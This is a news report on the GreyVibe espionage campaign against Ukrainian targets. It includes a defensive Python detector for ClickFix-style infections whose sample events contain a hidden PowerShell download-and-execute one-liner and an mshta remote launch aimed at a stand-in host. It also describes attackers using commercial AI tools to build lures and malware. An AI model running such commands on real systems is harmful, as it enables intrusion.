A suspected Russian threat actor known as GreyVibe has been deploying AI-crafted lures alongside a broad arsenal of bespoke malware to target military, government, civilian, and business organizations.
This cyberespionage operation has been active since at least August 2025 and appears to serve Russian state objectives, though analysts stop short of formally categorizing it as a nation-state campaign.
WithSecure cybersecurity researchers first detected the activity in January and identified Ukrainian and Ukraine-linked organizations as the primary targets.
Evidence pointing to a Russian-speaking origin includes the language used in malware administration panels, comments found in code files, and the command-and-control (C2) servers being configured to UTC+3, which corresponds to Moscow time.
The researchers documented several attack methods used by GreyVibe:
- PhantomMail: Targeted spear-phishing emails carrying malicious ZIP or RAR archives hosted on Google Drive and 4sync, with decoy PDF attachments or staged error messages masking the malware drop. The lures impersonated Ukrainian government offices, emergency services, telecommunications providers, and energy sector entities.
- PhantomClick: Counterfeit CAPTCHA or ClickFix webpages mimicking Zoom and LAPAS portals, presented as a fake Cloudflare security check, which trick victims into copying a command and running it themselves, infecting their own machine.
- PrincessClub: Fraudulent Ukrainian adult or dating sites used to push the FallSpy Android surveillance tool and the PhantomRelay/LegionRelay Windows malware. The operators posed as women on Telegram to lure victims, later adding WebRTC-based live video or audio calls that could record the target.
- DroneLink: Bogus Ukrainian military fundraising websites themed around FPV drones and UAVs, sharing backend infrastructure and tooling with the PrincessClub operation.
- Nebo: Fake login pages imitating “СПО НЕБО,” a Russian military communications platform, apparently crafted to deceive Ukrainian military personnel into believing they were logging into a Russian military terminal.
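The PhantomClick technique relies on the victim pasting a one-liner into the Win+R dialog or a console, which leaves a distinctive process-creation trail: a scripting host spawned by explorer.exe or a browser with a hidden window, an execution-policy bypass, a download cradle, and often a reassuring "I am not a robot" comment appended so the Run box looks harmless. The following Python script is an added example written for this article, not tooling from WithSecure or the GreyVibe actor; it scores constructed process-creation events (field names loosely follow Sysmon Event ID 1) against those hallmarks. The parent-process list, regexes, sample events and `.invalid` hostnames are assumptions for the illustration, not indicators published by WithSecure.

```python
"""Heuristic triage of ClickFix-style "paste this command" infections.

Added example for this article; not code from WithSecure or the GreyVibe
actor. It scores constructed process-creation events (field names loosely
follow Sysmon Event ID 1) for hallmarks of a user pasting a command copied
from a fake CAPTCHA / Cloudflare check page into Win+R or a console.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Parents a pasted one-liner is usually launched from: the Win+R dialog
# (explorer.exe), a browser, or an interactive shell. Assumed list, not
# derived from any published IoC.
PASTE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                 "cmd.exe", "windowsterminal.exe"}

# Living-off-the-land binaries that ClickFix one-liners commonly invoke.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe",
           "certutil.exe", "bitsadmin.exe", "wscript.exe", "cscript.exe"}

# Command-line patterns; each match contributes one named indicator.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "bypass_policy":   re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I),
    "download_cradle": re.compile(r"invoke-webrequest|invoke-restmethod|invoke-expression|"
                                  r"downloadstring|downloadfile|\b(?:iwr|irm|iex)\b", re.I),
    "remote_url":      re.compile(r"https?://\S+", re.I),
    # ClickFix pages often append a reassuring comment so the Run box
    # shows "I am not a robot" instead of the payload.
    "captcha_decoy":   re.compile(r"i am not a robot|verify you are human|cloudflare|ray id", re.I),
    "mshta_url":       re.compile(r"mshta(?:\.exe)?\s+['\"]?https?://", re.I),
}
FLAG_THRESHOLD = 3  # indicators needed before an event is reported


@dataclass
class Event:
    image: str          # full path or basename of the created process
    parent_image: str
    command_line: str


@dataclass
class Finding:
    event: Event
    indicators: List[str]

    @property
    def score(self) -> int:
        return len(self.indicators)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Event) -> Optional[Finding]:
    """Return a Finding for LOLBin launches, or None if the image is not one."""
    if _basename(ev.image) not in LOLBINS:
        return None
    hits = [name for name, rx in INDICATORS.items() if rx.search(ev.command_line)]
    parent = _basename(ev.parent_image)
    if parent in PASTE_PARENTS:
        hits.append("parent_" + parent[:-4])  # strip ".exe"
    return Finding(ev, hits)


def detect(events: List[Event], threshold: int = FLAG_THRESHOLD) -> List[Finding]:
    """Score every event and keep those at or above the threshold, highest first."""
    findings = [f for f in map(score_event, events) if f and f.score >= threshold]
    return sorted(findings, key=lambda f: f.score, reverse=True)


# Constructed sample events; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
          "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
          "powershell.exe -w hidden -ep bypass -c \"iex (iwr 'http://verify.example.invalid/check.txt' "
          "-UseBasicParsing).Content\" # I am not a robot - reCAPTCHA Verification ID: 8413"),
    Event(r"C:\Windows\System32\mshta.exe", r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
          "mshta.exe https://verify.example.invalid/check.hta"),
    Event(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\services.exe",
          r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1"),
    Event(r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\explorer.exe",
          "chrome.exe --profile-directory=Default"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"score={f.score} image={_basename(f.event.image)} indicators={f.indicators}")
        print(f"  cmd: {f.event.command_line}")
```

Run as-is, the script reports the pasted PowerShell cradle (six indicators) and the mshta launch from Edge (three), while the scheduled backup script with a lone execution-policy bypass stays below the threshold. The same regex set can be applied to the values under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, where Windows records what a user typed into the Win+R dialog, which is useful during forensic review of a host suspected of a ClickFix infection.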
The sophistication and realism of these decoy materials stand out, and WithSecure attributes this to the heavy use of AI platforms such as ChatGPT, Ideogram AI, and Google Gemini in crafting highly convincing, detailed content for the campaigns.
AI involvement extends beyond content generation into tool development. Researchers identified custom obfuscators named LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP, which they believe were largely produced with the aid of large language models.
A PowerShell-based remote access trojan called LegionRelay was also almost certainly built with AI assistance, according to the analysis.
LegionRelay is capable of stealing files, taking screenshots, harvesting browser credentials, exfiltrating data from Telegram and WhatsApp, and configuring remote desktop access.
Another piece of malware in GreyVibe’s toolkit is PhantomRelay, also a PowerShell RAT. It fingerprints the host, loads additional scripts dynamically at runtime, and can execute both PowerShell and native Windows commands.
In addition, the group deployed FallSpy, an Android spyware tool built solely for intelligence collection, through both the PrincessClub and Nebo campaigns.
The spyware harvests contact lists, call history, device and network details, location data, media files, and SIM card information.
While the GreyVibe operation shares characteristics with nation-state activity, WithSecure notes it “did not meet the level of sophistication and operational security typically associated with established nation-state actors.”
Moreover, the PhantomRelay malware has been independently observed in financially motivated cybercrime operations, though researchers were able to distinguish those uses from the state-aligned ones. This has led to speculation that GreyVibe “may include current or former cybercrime operatives within its ranks.”
Supporting this theory, early-stage and test builds of the malware used a unique ISO creation tool previously linked to a faction of former TrickBot operatives, the group tracked as UAC-0098, which targeted Ukraine at the onset of the Russian invasion.
Additional red flags include the group uploading development and test builds to publicly accessible scanning services, a habit inconsistent with disciplined nation-state tradecraft. In some cases, a cryptocurrency miner was also observed running on compromised machines.
The exact nature of the group’s composition remains unclear, with researchers considering three possibilities: former cybercriminals absorbed into a state-backed unit, independent cybercriminal actors operating under state tasking, or a hybrid arrangement mixing state-affiliated and criminal personnel.
Defenders can build detection and mitigation strategies against GreyVibe’s tactics by leveraging the indicators of compromise (IoCs) published by WithSecure.